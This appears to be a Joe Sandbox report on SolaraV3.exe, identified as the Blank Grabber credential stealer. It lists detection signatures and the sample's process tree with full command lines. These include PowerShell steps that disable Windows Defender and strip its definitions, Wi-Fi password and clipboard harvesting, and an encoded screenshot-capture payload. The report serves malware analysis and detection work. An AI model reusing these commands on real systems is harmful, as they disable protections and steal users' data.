Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SolaraV3.exe

Overview

General Information

Sample name:SolaraV3.exe
Analysis ID:1525849
MD5:7dd77a8611b56c1ed090293e3ab40f08
SHA1:1cb4be6453ab5dbeebd8339e0ec4264d6efa611c
SHA256:5d887dd72893e3bd40b291a1dc3ea2bc94f6d0daf4de318bd1005b57fbe114ca
Tags:exeuser-aachum
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Steals Internet Explorer cookies
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SolaraV3.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\SolaraV3.exe" MD5: 7DD77A8611B56C1ED090293E3AB40F08)
    • SolaraV3.exe (PID: 4892 cmdline: "C:\Users\user\Desktop\SolaraV3.exe" MD5: 7DD77A8611B56C1ED090293E3AB40F08)
      • cmd.exe (PID: 1652 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1312 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1660 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6044 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 5248 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 2564 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 6484 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 4800 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 4212 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2692 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6636 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5700 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4196 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 5924 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6672 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2584 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2076 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3724 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3040 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1832 cmdline: attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 2940 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7052 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1832 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7448 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 3040 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7400 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7308 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7484 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7640 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7824 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7680 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7808 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7244 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8128 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5736 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7312 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
